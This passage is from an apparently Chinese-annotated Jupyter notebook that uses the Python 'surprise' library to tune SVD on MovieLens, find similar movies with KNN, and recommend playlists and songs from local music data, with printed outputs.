"from surprise import SVD,KNNWithMeans\nfrom surprise import Dataset\nfrom surprise import evaluate,print_perf\n\n# load movielens datasets\ndata = Dataset.load_builtin('ml-100k')\n\n# k折交叉验证\n%time data.split(n_folds = 3)\n\n# 试试SVD分解\n%time algo = SVD()\nprint (algo)\n# Evaluate the performance of the algorithm on given data\n# return A dictionary containing measures as keys and lists as values. Each list contains one entry per fold\n%time perf = evaluate(algo,data,measures=[u'rmse', u'mae'] )\n%time print_perf(perf)",
"Wall time: 68 ms\nWall time: 0 ns\n<surprise.prediction_algorithms.matrix_factorization.SVD object at 0x00000000123A3C18>\nEvaluating RMSE, MAE of algorithm SVD.\n\n------------\nFold 1\n"
],
[
"data.raw_ratings[0]",
"_____no_output_____"
]
],
[
[
"### 算法调参",
"_____no_output_____"
],
[
"### 这里实现的算法是SVD 等,一些超参数的选择也会最终影响后果。下面可以使用sklearn 中的网格搜索交叉验证来GridsearchCV来选择最终的参数\n\n",
"_____no_output_____"
]
],
[
[
"from surprise import GridSearch\nfrom surprise import SVD # or KNNWithMeans also can be OK!\nfrom surprise import Dataset\n# Following parameters use can be understand by help(GridSearch)\nalgo_class = SVD # KNNWithMeans also can be OK!\nparam_grid = {'n_epochs':[5,10], 'lr_all':[0.002,0.005], 'reg_all':[0.4,0.6]}\nmeasures = ['rmse', 'mae']\n\ngridsearch = GridSearch(algo_class,param_grid,measures, n_jobs = -1 , verbose = True)\ndata = Dataset.load_builtin('ml-100k')\ndata.split(n_folds = 4)\n\ngridsearch.evaluate(data)",
"Running grid search for the following parameter combinations:\n{u'lr_all': 0.002, u'reg_all': 0.4, u'n_epochs': 5}\n{u'lr_all': 0.002, u'reg_all': 0.4, u'n_epochs': 10}\n{u'lr_all': 0.002, u'reg_all': 0.6, u'n_epochs': 5}\n{u'lr_all': 0.002, u'reg_all': 0.6, u'n_epochs': 10}\n{u'lr_all': 0.005, u'reg_all': 0.4, u'n_epochs': 5}\n{u'lr_all': 0.005, u'reg_all': 0.4, u'n_epochs': 10}\n{u'lr_all': 0.005, u'reg_all': 0.6, u'n_epochs': 5}\n{u'lr_all': 0.005, u'reg_all': 0.6, u'n_epochs': 10}\nResulsts:\n{u'lr_all': 0.002, u'reg_all': 0.4, u'n_epochs': 5}\n{u'MAE': 0.8018551244250034, u'RMSE': 0.9932174367810193}\n----------\n{u'lr_all': 0.002, u'reg_all': 0.4, u'n_epochs': 10}\n{u'MAE': 0.7832613784600437, u'RMSE': 0.9749094382803938}\n----------\n{u'lr_all': 0.002, u'reg_all': 0.6, u'n_epochs': 5}\n{u'MAE': 0.8110030936953079, u'RMSE': 0.9996999802164589}\n----------\n{u'lr_all': 0.002, u'reg_all': 0.6, u'n_epochs': 10}\n{u'MAE': 0.7940102667564738, u'RMSE': 0.9834308452554275}\n----------\n{u'lr_all': 0.005, u'reg_all': 0.4, u'n_epochs': 5}\n{u'MAE': 0.7796992803135402, u'RMSE': 0.9710325407811311}\n----------\n{u'lr_all': 0.005, u'reg_all': 0.4, u'n_epochs': 10}\n{u'MAE': 0.7711126696361924, u'RMSE': 0.9618930607113133}\n----------\n{u'lr_all': 0.005, u'reg_all': 0.6, u'n_epochs': 5}\n{u'MAE': 0.7909796864971992, u'RMSE': 0.9801357839418171}\n----------\n{u'lr_all': 0.005, u'reg_all': 0.6, u'n_epochs': 10}\n{u'MAE': 0.7831766193962327, u'RMSE': 0.9719639652268127}\n----------\n"
]
],
[
[
"### 用户216 对电影11的打分是5.0分,时间是880234346",
"_____no_output_____"
]
],
[
[
"data.raw_ratings[1] # user, item, rating, timestamp",
"_____no_output_____"
]
],
[
[
"### 输出模型评价",
"_____no_output_____"
]
],
[
[
"gridsearch.best_score",
"_____no_output_____"
],
[
"gridsearch.best_score['rmse']",
"_____no_output_____"
],
[
"gridsearch.best_estimator",
"_____no_output_____"
],
[
"gridsearch.best_params",
"_____no_output_____"
],
[
"gridsearch.best_params['mae']",
"_____no_output_____"
],
[
"gridsearch.best_params['rmse']",
"_____no_output_____"
],
[
"gridsearch.best_score",
"_____no_output_____"
],
[
"gridsearch.best_index",
"_____no_output_____"
],
[
"gridsearch.cv_results",
"_____no_output_____"
],
[
"help(GridSearch)",
"Help on class GridSearch in module surprise.evaluate:\n\nclass GridSearch\n | .. warning::\n | Deprecated since version 1.05. Use :func:`GridSearchCV\n | <surprise.model_selection.search.GridSearchCV>` instead. This\n | class will be removed in later versions.\n | \n | The :class:`GridSearch` class, used to evaluate the performance of an\n | algorithm on various combinations of parameters, and extract the best\n | combination. It is analogous to `GridSearchCV\n | <http://scikit-learn.org/stable/modules/generated/sklearn.\n | model_selection.GridSearchCV.html>`_ from scikit-learn.\n | \n | See :ref:`User Guide <tuning_algorithm_parameters>` for usage.\n | \n | Args:\n | algo_class(:obj:`AlgoBase <surprise.prediction_algorithms.algo_base.AlgoBase>`): The class\n | object of the algorithm to evaluate.\n | param_grid(dict): Dictionary with algorithm parameters as keys and\n | list of values as keys. All combinations will be evaluated with\n | desired algorithm. Dict parameters such as ``sim_options`` require\n | special treatment, see :ref:`this note<grid_search_note>`.\n | measures(list of string): The performance measures to compute. Allowed\n | names are function names as defined in the :mod:`accuracy\n | <surprise.accuracy>` module. Default is ``['rmse', 'mae']``.\n | n_jobs(int): The maximum number of algorithm training in parallel.\n | \n | - If ``-1``, all CPUs are used.\n | - If ``1`` is given, no parallel computing code is used at all, which is useful for debugging.\n | - For ``n_jobs`` below ``-1``, ``(n_cpus + n_jobs + 1)`` are used. For example, with ``n_jobs = -2`` all CPUs but one are used.\n | \n | Default is ``1``.\n | pre_dispatch(int or string): Controls the number of jobs that get\n | dispatched during parallel execution. Reducing this number can be\n | useful to avoid an explosion of memory consumption when more jobs\n | get dispatched than CPUs can process. This parameter can be:\n | \n | - ``None``, in which case all the jobs are immediately created and spawned. Use this for lightweight and fast-running jobs, to avoid delays due to on-demand spawning of the jobs.\n | - An int, giving the exact number of total jobs that are spawned.\n | - A string, giving an expression as a function of ``n_jobs``, as in ``'2*n_jobs'``.\n | \n | Default is ``'2*n_jobs'``.\n | seed(int): The value to use as seed for RNG. It will determine how\n | splits are defined. If ``None``, the current time since epoch is\n | used. Default is ``None``.\n | verbose(bool): Level of verbosity. If ``False``, nothing is printed. If\n | ``True``, The mean values of each measure are printed along for\n | each parameter combination. Default is ``True``.\n | joblib_verbose(int): Controls the verbosity of joblib: the higher, the\n | more messages.\n | \n | Attributes:\n | cv_results (dict of arrays):\n | A dict that contains all parameters and accuracy information for\n | each combination. Can be imported into a pandas `DataFrame`.\n | best_estimator (dict of AlgoBase):\n | Using an accuracy measure as key, get the estimator that gave the\n | best accuracy results for the chosen measure.\n | best_score (dict of floats):\n | Using an accuracy measure as key, get the best score achieved for\n | that measure.\n | best_params (dict of dicts):\n | Using an accuracy measure as key, get the parameters combination\n | that gave the best accuracy results for the chosen measure.\n | best_index (dict of ints):\n | Using an accuracy measure as key, get the index that can be used\n | with `cv_results` that achieved the highest accuracy for that\n | measure.\n | \n | Methods defined here:\n | \n | __init__(self, algo_class, param_grid, measures=[u'rmse', u'mae'], n_jobs=1, pre_dispatch=u'2*n_jobs', seed=None, verbose=1, joblib_verbose=0)\n | \n | evaluate(self, data)\n | Runs the grid search on dataset.\n | \n | Class instance attributes can be accessed after the evaluate is done.\n | \n | Args:\n | data (:obj:`Dataset <surprise.dataset.Dataset>`): The dataset on\n | which to evaluate the algorithm.\n\n"
]
],
[
[
"## 协同过滤建模后,根据一个items寻找相似度最高的item,使用algo.get_neighbors 函数\n ",
"_____no_output_____"
]
],
[
[
"### 先认识一下处理的数据 特征\n### in C:\\Users\\Yazhou\\.surprise_data\\ml-100k\\ml-100k\\u/item\nimport io\nimport os\nfile_name = (os.path.expanduser('~') + '/.surprise_data/ml-100k/ml-100k/u.item')\nwith io.open(file_name,'r',encoding = 'ISO-8859-1') as f:\n for line in f:\n #print \">>>Output: \",line\n pass",
"_____no_output_____"
]
],
[
[
"### 1. 针对自带的Movielens 数据集做推荐",
"_____no_output_____"
]
],
[
[
"from __future__ import (absolute_import,division,print_function,unicode_literals)\nimport os \nimport io\nfrom surprise import Dataset\nfrom surprise import KNNBasic # or KNNBaseline\n\nfile_name = (os.path.expanduser('~') + '/.surprise_data/ml-100k/ml-100k/u.item')\ndef read_item_names():\n \"获取电影ID到电影名字,电影名字到电影ID的映射关系\"\n rid_to_name = {}\n name_to_rid = {}\n with io.open(file_name,'r',encoding = 'ISO-8859-1') as f: # \"ISO-8859-1\" 是官方指定的字体\n for line in f:\n line = line.split('|') # 从上面的数据格式可以看出原始数据是ID|Name 的先后顺序\n #print(\"line is:\",line)\n rid_to_name[line[0]] = line[1] # 字典,line[0] is key, line[1] is value # 数据在dict中的位置并不是line[0]\n name_to_rid[line[1]] = line[0] # 字典, line[1] is key, line[0] is value,\n #print (\"line[0] is \", line[0])\n #print (\"line[1] is \", line[1])\n #print (\">>> rid_to_name is\",rid_to_name)\n #print (\"<<< name_to_rid is\",name_to_rid)\n return rid_to_name,name_to_rid \n\n\"利用算法来计算item之间的相似度\"\ndata = Dataset.load_builtin('ml-100k')\nimport random\nmy_seed = 200\nrandom.seed(my_seed)\ntrainset = data.build_full_trainset()\n# data.split(n_folds = 4,shuffle = True) # Split the dataset into folds for future cross-validation from help(data)\nsim_options = {'name':'pearson_baseline','user_based':False,'verbose':True}\n# 基于用户的协同过滤\nalgo = KNNBasic(sim_options = sim_options)\nalgo.fit(trainset)\n",
"Estimating biases using als...\nComputing the pearson_baseline similarity matrix...\nDone computing similarity matrix.\n"
],
[
"\"下面的例子证明字典里面的数据:'This is one new movies' 并没有出现在第3的位置\"\ndict1 = {u'1': u'Toy Story (1995)', u'2': u'GoldenEye (1995)'}\ndict1[3] = 'This is one new movies'\ndict1",
"_____no_output_____"
],
[
"\"计算pearson_baseline相似矩阵\"\nsimilarity_matrix = algo.compute_similarities()",
"Computing the pearson_baseline similarity matrix...\nDone computing similarity matrix.\n"
],
[
"\"获取电影ID到电影名字,电影名字到电影ID的数据映射关系\"\nrid_to_name,name_to_rid = read_item_names()",
"_____no_output_____"
],
[
"\"rid_to_name 数据:电影ID到电影名字的映射字典\"\nrid_to_name",
"_____no_output_____"
],
[
"\"name_to_rid 数据:电影名字到电影ID的映射字典\"\nname_to_rid",
"_____no_output_____"
],
[
"\"原始电影ID到 inner id 的转化过程: 转化来着模型的数据需要\"\nraw_movie_id = name_to_rid['Bye Bye, Love (1995)'] # Toy Story (1995) # Bye Bye, Love (1995)\n#raw_movie_id => 1446 raw movie id \n\niinder_movie_id = algo.trainset.to_inner_iid(raw_movie_id)\n#iinder_movie_id => 1217 inner movie id for using in model",
"_____no_output_____"
],
[
"\"通过get_neighbors 来计算inner id: iid = 1217 的最近/最相似的k个相似\"\niid = iinder_movie_id\nk = 12\n\n\"找到的距离目标最近的几个item,返回的inner id:iid\" \"to_raw_iid/to_inner_iid 都是针对item的id转换\" \nkneighbors_iid = algo.get_neighbors(iid, k) # Returns:The list of the ``k`` (inner) ids of the closest users (or items)to ``iid``\n\n\"将inner id:iid 转换成原始id:rawid\"\nkneighbors_rawid = (algo.trainset.to_raw_iid(k_iid) for k_iid in kneighbors_iid) # 返回生成器\n\n\"依照原始id:rawid 找到对应的电影名字\"\nmovie_withrawid = [rid_to_name[k_rawid] for k_rawid in kneighbors_rawid] # 也可以是生成器,但是写成了list了\n\n\"打印输出跟目标最相似的几个电影名字\"\n#for movie in movie_withrawid:\n# print (\"找到跟目标电影最相似的k(k = 12)个电影分别是:\",movie)\n\nfor kth in range(0,k):\n print (\"找到跟目标电影最相似的第 %d 电影是: %s\" %(1 + kth,movie_withrawid[kth]))\n ",
"找到跟目标电影最相似的第 1 电影是: Paper, The (1994)\n找到跟目标电影最相似的第 2 电影是: Godfather, The (1972)\n找到跟目标电影最相似的第 3 电影是: Hunt for Red October, The (1990)\n找到跟目标电影最相似的第 4 电影是: Down Periscope (1996)\n找到跟目标电影最相似的第 5 电影是: Brady Bunch Movie, The (1995)\n找到跟目标电影最相似的第 6 电影是: Speed (1994)\n找到跟目标电影最相似的第 7 电影是: Home Alone (1990)\n找到跟目标电影最相似的第 8 电影是: Young Frankenstein (1974)\n找到跟目标电影最相似的第 9 电影是: Fifth Element, The (1997)\n找到跟目标电影最相似的第 10 电影是: That Thing You Do! (1996)\n找到跟目标电影最相似的第 11 电影是: Willy Wonka and the Chocolate Factory (1971)\n找到跟目标电影最相似的第 12 电影是: With Honors (1994)\n"
]
],
[
[
"### 2.使用音乐数据预测",
"_____no_output_____"
]
],
[
[
"from __future__ import (absolute_import, division, print_function,unicode_literals)\nimport os \nimport io\nfrom surprise import KNNBaseline,Reader,KNNBasic,KNNWithMeans\nfrom surprise import Dataset\nimport cPickle as pickle\n\n\"重建流行歌单ID到歌单名字的映射关系\"\nplaylistid_to_name = {}\nplaylistid_to_name = pickle.load(open(\"./InternalData/6_popular_playlist.pkl\", 'rb'))\nprint(\"重建流行歌单ID到歌单名字的映射关系 完成....\")\n\n\"重建歌单名到歌单ID的映射关系\"\nplaylistname_to_id = {}\nfor playlist_id in playlistid_to_name:\n playlistname_to_id[playlistid_to_name[playlist_id]] = playlist_id\nprint(\"重建流行歌单名到歌单ID的映射关系 完成....\")\n\nfile_path = os.path.expanduser(\"./InternalData/3_music_popularplaylist_surpriseformat.txt\")\n\n\"指定文件格式...\"\nreader = Reader(line_format = \"user item rating timestamp\",sep = ',')\n\n\"载入指定的数据集\"\nloaded_musicdata = Dataset.load_from_file(file_path = file_path, reader = reader)\n\n\"计算歌曲之间的相识度\"\nmusic_full_trainset = loaded_musicdata.build_full_trainset()\nprint(\"构建数据集合完成。。。\")",
"重建流行歌单ID到歌单名字的映射关系 完成....\n重建流行歌单名到歌单ID的映射关系 完成....\n构建数据集合完成。。。\n"
],
[
"\"歌单ID到歌单的映射关系,存放在这样一个字典中\"\n#playlistid_to_name.keys()\n#playlistid_to_name.values()",
"_____no_output_____"
],
[
"print (playlistid_to_name[playlistid_to_name.keys()[2] ])",
"100种深情皆苦 | 你又不知道我难过\n"
],
[
"\"music 基本数据特征\"\nmusic_full_trainset.n_users\n#music_full_trainset.n_items\n#music_full_trainset.rating_scale\n#music_full_trainset.global_mean",
"_____no_output_____"
]
],
[
[
"### 2.1下面是针对歌单的个性推荐",
"_____no_output_____"
]
],
[
[
"\"开始训练模型 - 找到相似的歌单(默认一个用户只建立一个歌单playlist)\"\nalgo = KNNBaseline() # \"默认是用户base 的KNN\"\nalgo.train(music_full_trainset)\n\n\"目标歌单名字\"\ntarget_playlistname = playlistname_to_id.keys()[39]\nprint (\"目标歌单名字:\",target_playlistname)\n\n\"目标歌单ID\"\ntarget_playlistid = playlistname_to_id[target_playlistname]\nprint (\"目标歌单原始ID:\",target_playlistid)\n\n\"将原始歌单ID转成inner id,用于get_neighbors 预测\" \".to_inner_uid/to_raw_uid 都是针对user:uid的函数推荐\"\ntarget_playlistiid = algo.trainset.to_inner_uid(target_playlistid)\nprint (\"目标歌单内部ID:\",target_playlistiid)\nk = 10\nplaylist_neignhbors_kid = algo.get_neighbors(target_playlistiid,k = k)\n\n\"将预测出的k个inner id 转成原始id:raw_id\"\nplaylist_neignhbors_rid = [algo.trainset.to_raw_uid(innerid) for innerid in playlist_neignhbors_kid]\n\"有k 个原始id:raw_id 找到对应的歌单名字\"\nplaylist_neignhbors_name = [playlistid_to_name[raw_uid] for raw_uid in playlist_neignhbors_rid]\n\n\"打印输出这k个电影名字:\"\nprint(\"\\n跟目标歌单<<\",target_playlistname,\">>相似的k个歌单分别是:\" )\nfor raw_playlistname in playlist_neignhbors_name:\n print (raw_playlistname,\"对应的inner id是:\",algo.trainset.to_inner_uid(playlistname_to_id[raw_playlistname]))",
"c:\\python27\\lib\\site-packages\\surprise\\prediction_algorithms\\algo_base.py:51: UserWarning: train() is deprecated. Use fit() instead\n warnings.warn('train() is deprecated. Use fit() instead', UserWarning)\n"
],
[
"\"针对歌曲个性推荐\"\nfrom __future__ import (absolute_import, division, print_function,unicode_literals)\nimport os \nimport io\nfrom surprise import KNNBaseline,Reader,KNNBasic,KNNWithMeans\nfrom surprise import Dataset\nimport cPickle as pickle\n\n\"重建流行歌曲ID到歌曲名字的映射关系\"\nsongid_to_name = {}\nsongid_to_name = pickle.load(open(\"./InternalData/7_popular_song.pkl\", 'rb'))\nprint (\"歌曲ID到歌曲名字的映射...完成!\")\n\"歌曲名字到歌曲ID的映射\"\nsongname_to_id = {}\nfor song_id in songid_to_name:\n songname_to_id[songid_to_name[song_id]]= song_id # 名字做key, id做value\nprint(\"歌曲名字到歌曲ID的映射....完成!\")\n\nfile_path = os.path.expanduser(\"./InternalData/3_music_popularplaylist_surpriseformat.txt\")\n\n\"指定文件格式...\"\nreader = Reader(line_format = \"user item rating timestamp\",sep = ',')\n\n\"载入指定的数据集\"\nloaded_songdata = Dataset.load_from_file(file_path = file_path, reader = reader)\nsong_full_trainset = loaded_songdata.build_full_trainset()\n\n\"模型\"\nalgo = KNNWithMeans()\nalgo.train(song_full_trainset)\n\n\"目标歌曲名字\"\ntarget_songname = songname_to_id.keys()[98]\nprint(\"目标歌曲名字 是:\",target_songname)\ntarget_songid = songname_to_id[target_songname]\nalgo.train.to-\n\n\n",
"歌曲ID到歌曲名字的映射...完成!\n歌曲名字到歌曲ID的映射....完成!\nComputing the msd similarity matrix...\nDone computing similarity matrix.\n目标歌曲名字 是: 难忘的一天\t许巍\n"
]
],
[
[
"### 2.2 下面是针对歌曲的个性推荐",
"_____no_output_____"
]
],
[
[
"from __future__ import (absolute_import, division, print_function,unicode_literals)\nimport os \nimport io\nfrom surprise import KNNBaseline,Reader,KNNBasic,KNNWithMeans\nfrom surprise import Dataset\nimport cPickle as pickle\n\n\"重建流行歌曲ID到歌曲名字的映射关系\"\nsongid_to_name = {}\nsongid_to_name = pickle.load(open(\"./InternalData/7_popular_song.pkl\", 'rb'))\nprint (\"歌曲ID到歌曲名字的映射...完成!\")\n\"歌曲名字到歌曲ID的映射\"\nsongname_to_id = {}\nfor song_id in songid_to_name:\n songname_to_id[songid_to_name[song_id]]= song_id # 名字做key, id做value\nprint(\"歌曲名字到歌曲ID的映射....完成!\")\n\n\"inner id = 4 的用户\"\nuser_inner_id = 4\n\n\"ur(:obj:`defaultdict` of :obj:`list`): The users ratings. This is a \\\ndictionary containing lists of tuples of the form ``(item_inner_id,\\\nrating)``. The keys are user inner ids.\"\nitem_inner_id_andrating = music_full_trainset.ur[user_inner_id] # user_rating 返回的是:(item_inner_id,rating)\nitem_inner_id = map(lambda x:x[0], item_inner_id_andrating)\n\nfor item_iid in item_inner_id:\n print (algo.predict(uid = user_inner_id,iid = item_iid,r_ui = None, clip = True,verbose=False),\n songid_to_name[algo.trainset.to_raw_iid(item_iid)])",
"歌曲ID到歌曲名字的映射...完成!\n歌曲名字到歌曲ID的映射....完成!\nuser: 4 item: 478 r_ui = None est = 1.00 {u'was_impossible': False} 听见下雨的声音\t魏如昀\nuser: 4 item: 429 r_ui = None est = 1.00 {u'was_impossible': False} 梦一场\t萧敬腾\nuser: 4 item: 936 r_ui = None est = 1.00 {u'was_impossible': False} 干杯\t西瓜Kune\nuser: 4 item: 937 r_ui = None est = 1.00 {u'was_impossible': False} 给自己的歌 (Live) - live\t纵贯线\nuser: 4 item: 938 r_ui = None est = 1.00 {u'was_impossible': False} 小半\t陈粒\nuser: 4 item: 939 r_ui = None est = 1.00 {u'was_impossible': False} 思念是一种病(Live) - live\t张震岳\nuser: 4 item: 940 r_ui = None est = 1.00 {u'was_impossible': False} 可以不可以\t丁当\nuser: 4 item: 941 r_ui = None est = 1.00 {u'was_impossible': False} 秋酿\t房东的猫\nuser: 4 item: 616 r_ui = None est = 1.00 {u'was_impossible': False} 退后\t周杰伦\nuser: 4 item: 942 r_ui = None est = 1.00 {u'was_impossible': False} 阴天\t莫文蔚\nuser: 4 item: 943 r_ui = None est = 1.00 {u'was_impossible': False} 痛爱\t容祖儿\nuser: 4 item: 944 r_ui = None est = 1.00 {u'was_impossible': False} 二十世纪少年(Unplugged) - unplug\tPing Pung\nuser: 4 item: 945 r_ui = None est = 1.00 {u'was_impossible': False} 前所未见\t陈慧琳\nuser: 4 item: 946 r_ui = None est = 1.00 {u'was_impossible': False} 追梦赤子心\tGALA\nuser: 4 item: 947 r_ui = None est = 1.00 {u'was_impossible': False} 如果你也听说\t张惠妹\nuser: 4 item: 948 r_ui = None est = 1.00 {u'was_impossible': False} 寄生\t吴克羣\nuser: 4 item: 949 r_ui = None est = 1.00 {u'was_impossible': False} 怎么唱情歌\t刘惜君\nuser: 4 item: 55 r_ui = None est = 1.00 {u'was_impossible': False} 忽然之间\t巴士那\nuser: 4 item: 950 r_ui = None est = 1.00 {u'was_impossible': False} 烟霞\t容祖儿\nuser: 4 item: 138 r_ui = None est = 1.00 {u'was_impossible': False} 小幸运\t双笙\nuser: 4 item: 951 r_ui = None est = 1.00 {u'was_impossible': False} 错过\t王铮亮\nuser: 4 item: 952 r_ui = None est = 1.00 {u'was_impossible': False} 泪海\t许茹芸\nuser: 4 item: 453 r_ui = None est = 1.00 {u'was_impossible': False} 外面的世界\t莫文蔚\nuser: 4 item: 840 r_ui = None est = 1.00 {u'was_impossible': False} 短发\t梁咏琪\nuser: 4 item: 953 r_ui = None est = 1.00 {u'was_impossible': False} 遗憾\t方炯镔\nuser: 4 item: 954 r_ui = None est = 1.00 {u'was_impossible': False} 假如让我说下去\t杨千嬅\nuser: 4 item: 955 r_ui = None est = 1.00 {u'was_impossible': False} 爱你\t许志安\nuser: 4 item: 956 r_ui = None est = 1.00 {u'was_impossible': False} 你的手信\t陈慧敏\nuser: 4 item: 352 r_ui = None est = 1.00 {u'was_impossible': False} 遗憾\t许美静\nuser: 4 item: 957 r_ui = None est = 1.00 {u'was_impossible': False} 无终\t谢春花\nuser: 4 item: 958 r_ui = None est = 1.00 {u'was_impossible': False} 骄傲的少年\t南征北战\nuser: 4 item: 959 r_ui = None est = 1.00 {u'was_impossible': False} 一个人一座城\t曹寅\nuser: 4 item: 960 r_ui = None est = 1.00 {u'was_impossible': False} 好得很\t麦家瑜\nuser: 4 item: 961 r_ui = None est = 1.00 {u'was_impossible': False} 终身美丽\t郑秀文\nuser: 4 item: 962 r_ui = None est = 1.00 {u'was_impossible': False} 倾城\t许美静\nuser: 4 item: 963 r_ui = None est = 1.00 {u'was_impossible': False} 想要你知道\t许亚童\nuser: 4 item: 964 r_ui = None est = 1.00 {u'was_impossible': False} 忆她\t赵烁\nuser: 4 item: 965 r_ui = None est = 1.00 {u'was_impossible': False} 边走边唱\t李荣浩\nuser: 4 item: 966 r_ui = None est = 1.00 {u'was_impossible': False} 再见只是陌生人\t庄心妍\nuser: 4 item: 967 r_ui = None est = 1.00 {u'was_impossible': False} 每条伤心的大街\t飘乐队\nuser: 4 item: 968 r_ui = None est = 1.00 {u'was_impossible': False} 死结\t李玖哲\nuser: 4 item: 969 r_ui = None est = 1.00 {u'was_impossible': False} 我是你的影子\tXun(易硕成)\nuser: 4 item: 970 r_ui = None est = 1.00 {u'was_impossible': False} 孤儿仔\t陈奕迅\nuser: 4 item: 971 r_ui = None est = 1.00 {u'was_impossible': False} 霜雪千年\t双笙\nuser: 4 item: 972 r_ui = None est = 1.00 {u'was_impossible': False} 想起小时候\t前冲\nuser: 4 item: 755 r_ui = None est = 1.00 {u'was_impossible': False} 给自己的情书\t王菲\nuser: 4 item: 279 r_ui = None est = 1.00 {u'was_impossible': False} 情非得已\t庾澄庆\nuser: 4 item: 973 r_ui = None est = 1.00 {u'was_impossible': False} 听说爱情回来过(Live) - live\t张敬轩\nuser: 4 item: 715 r_ui = None est = 1.00 {u'was_impossible': False} 至少还有你\t林忆莲\nuser: 4 item: 974 r_ui = None est = 1.00 {u'was_impossible': False} 致自己\t齐一\nuser: 4 item: 975 r_ui = None est = 1.00 {u'was_impossible': False} 可惜我不是他\tXun\nuser: 4 item: 976 r_ui = None est = 1.00 {u'was_impossible': False} 恋人心\t魏新雨\nuser: 4 item: 977 r_ui = None est = 1.00 {u'was_impossible': False} 美好事物\t房东的猫\nuser: 4 item: 978 r_ui = None est = 1.00 {u'was_impossible': False} 你就要走了\t花粥\nuser: 4 item: 979 r_ui = None est = 1.00 {u'was_impossible': False} 一半\t薛之谦\nuser: 4 item: 259 r_ui = None est = 1.00 {u'was_impossible': False} 斑马斑马 - 翻唱\t房东的猫\nuser: 4 item: 980 r_ui = None est = 1.00 {u'was_impossible': False} 还想听你的故事\t谢春花\nuser: 4 item: 981 r_ui = None est = 1.00 {u'was_impossible': False} 房间\t刘瑞琦\nuser: 4 item: 982 r_ui = None est = 1.00 {u'was_impossible': False} 狮子座(live)\t曾轶可\nuser: 4 item: 611 r_ui = None est = 1.00 {u'was_impossible': False} 青花瓷\t周杰伦\nuser: 4 item: 983 r_ui = None est = 1.00 {u'was_impossible': False} 目前\t洪卓立\nuser: 4 item: 984 r_ui = None est = 1.00 {u'was_impossible': False} 月球下的人\t李幸倪\nuser: 4 item: 985 r_ui = None est = 1.00 {u'was_impossible': False} 明明\t钟一宪\nuser: 4 item: 986 r_ui = None est = 1.00 {u'was_impossible': False} 一棵会开花的树(demo)\t谢春花\nuser: 4 item: 987 r_ui = None est = 1.00 {u'was_impossible': False} 借我\t谢春花\nuser: 4 item: 209 r_ui = None est = 1.00 {u'was_impossible': False} 丑八怪\t薛之谦\nuser: 4 item: 988 r_ui = None est = 1.00 {u'was_impossible': False} 习惯失恋\t容祖儿\nuser: 4 item: 989 r_ui = None est = 1.00 {u'was_impossible': False} 红玫瑰\t陈奕迅\nuser: 4 item: 192 r_ui = None est = 1.00 {u'was_impossible': False} 漂洋过海来看你\t周深\nuser: 4 item: 990 r_ui = None est = 1.00 {u'was_impossible': False} 那女孩对我说\t黄义达\nuser: 4 item: 991 r_ui = None est = 1.00 {u'was_impossible': False} 后来\t群星\nuser: 4 item: 992 r_ui = None est = 1.00 {u'was_impossible': False} 喜剧之王\t李荣浩\nuser: 4 item: 993 r_ui = None est = 1.00 {u'was_impossible': False} 爱你\t陈芳语\nuser: 4 item: 994 r_ui = None est = 1.00 {u'was_impossible': False} 我爱你\t卢广仲\nuser: 4 item: 995 r_ui = None est = 1.00 {u'was_impossible': False} 遇见你的时候所有星星都落到我头上\t高姗\nuser: 4 item: 996 r_ui = None est = 1.00 {u'was_impossible': False} 一身诗意千寻瀑\t不才\nuser: 4 item: 997 r_ui = None est = 1.00 {u'was_impossible': False} 你在烦恼什么\t苏打绿\nuser: 4 item: 998 r_ui = None est = 1.00 {u'was_impossible': False} 我为自己代言\t魏晨\nuser: 4 item: 141 r_ui = None est = 1.00 {u'was_impossible': False} 夜空中最亮的星\t逃跑计划\nuser: 4 item: 999 r_ui = None est = 1.00 {u'was_impossible': False} 阴天快乐\t陈奕迅\nuser: 4 item: 132 r_ui = None est = 1.00 {u'was_impossible': False} 原谅\t张玉华\nuser: 4 item: 1000 r_ui = None est = 1.00 {u'was_impossible': False} 放过自己\t庄心妍\nuser: 4 item: 1001 r_ui = None est = 1.00 {u'was_impossible': False} 最好的我\t龚芝怡\nuser: 4 item: 317 r_ui = None est = 1.00 {u'was_impossible': False} 爱一点\t莫艳琳\nuser: 4 item: 1002 r_ui = None est = 1.00 {u'was_impossible': False} 陪我看日出\t蔡淳佳\nuser: 4 item: 1003 r_ui = None est = 1.00 {u'was_impossible': False} 幸福了 然后呢\tA-Lin\nuser: 4 item: 1004 r_ui = None est = 1.00 {u'was_impossible': False} 耿耿于怀\t麦浚龙\nuser: 4 item: 1005 r_ui = None est = 1.00 {u'was_impossible': False} 不说出的温柔\t范逸臣\nuser: 4 item: 1006 r_ui = None est = 1.00 {u'was_impossible': False} 初爱\t杨宗纬\nuser: 4 item: 1007 r_ui = None est = 1.00 {u'was_impossible': False} 只不过是\t花粥\nuser: 4 item: 1008 r_ui = None est = 1.00 {u'was_impossible': False} 理想三旬\t陈鸿宇\nuser: 4 item: 137 r_ui = None est = 1.00 {u'was_impossible': False} 小幸运(Cover 田馥甄)\t金玟岐\nuser: 4 item: 1009 r_ui = None est = 1.00 {u'was_impossible': False} 那又如何\t应嘉俐\nuser: 4 item: 1010 r_ui = None est = 1.00 {u'was_impossible': False} 小相思\t花粥\nuser: 4 item: 1011 r_ui = None est = 1.00 {u'was_impossible': False} 我不难过\t孙燕姿\nuser: 4 item: 1012 r_ui = None est = 1.00 {u'was_impossible': False} 你看不到的天空\t蔡旻佑\nuser: 4 item: 1013 r_ui = None est = 1.00 {u'was_impossible': False} 耿耿于怀\t王笑文\nuser: 4 item: 1014 r_ui = None est = 1.00 {u'was_impossible': False} 试探\t王般若\nuser: 4 item: 1015 r_ui = None est = 1.00 {u'was_impossible': False} 有你陪伴的夏天\t黄婧\nuser: 4 item: 1016 r_ui = None est = 1.00 {u'was_impossible': False} 不说再见\t好妹妹乐队\n"
]
],
[
[
"### 使用矩阵分解做预测",
"_____no_output_____"
]
],
[
[
